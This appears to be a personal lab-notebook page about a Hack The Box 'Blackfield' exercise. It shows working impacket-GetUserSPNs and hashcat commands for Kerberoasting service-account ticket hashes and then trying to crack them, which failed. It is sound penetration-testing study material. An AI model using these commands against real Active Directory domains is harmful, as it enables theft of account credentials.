InfoSec LAB

Blackfield_Kerberoasting_Failed

Created: 2 min read

Kerberoasting

kerberoasting is an attack where an adversary targets service tickets granted by the Key Distribution Center (KDC) in a Kerberos authentication system. The attacker requests service tickets for specific service accounts and attempts to crack the encrypted Ticket Granting Service (TGS) tickets offline, seeking to obtain plaintext credentials. This attack takes advantage of weak encryption used to protect service tickets, enabling the adversary to potentially compromise user accounts.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=support@dc01.blackfield.local.ccache impacket-GetUserSPNs BLACKFIELD.LOCAL/@dc01.blackfield.local -no-pass -k -request -usersfile users.txt -outputfile kerberoasting.hash -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[...REDACTED...]

Using the TGT of the support user, Kerberoasting the “kerberoast-able” accounts can be achieved, effectively extracting and saving the TGS hashes

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ wc -l kerberoasting.hash                  
19 kerberoasting.hash

With the exception of the machine account and krbtgt, A total of 17 TGS hashes were extracted via Kerberoasting

Password Cracking (fail)

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat --show kerberoasting.hash
The following 2 hash-modes match the structure of your input hash:
 
      # | Name                                                       | Category
  ======+============================================================+======================================
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol

It detects the etype 18 due to the machine account and krbtgt. I will be ignoring those 2

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ hashcat -a 0 -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashfile 'kerberoasting.hash' on line 1 ($krb5t...e44ff4d49a5659343cc96a2f4540d7bc): Separator unmatched
Hashfile 'kerberoasting.hash' on line 2 ($krb5t...fbcbd444d07baba903db60258a729810): Separator unmatched
Hashes: 17 digests; 17 unique digests, 17 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: kerberoasting.hash
Time.Started.....: Thu Dec 21 10:45:00 2023 (1 min, 31 secs)
Time.Estimated...: Thu Dec 21 10:46:31 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2596.6 kH/s (0.91ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/17 (0.00%) Digests (total), 0/17 (0.00%) Digests (new), 0/17 (0.00%) Salts
Progress.........: 243854562/243854562 (100.00%)
Rejected.........: 0/243854562 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:16 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121736578796269746368] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 67%
 
Started: Thu Dec 21 10:44:58 2023
Stopped: Thu Dec 21 10:46:31 2023

hashcat was unable to crack those 17 TGS hashes It seems to be deadend

Interactive Graph View

Backlinks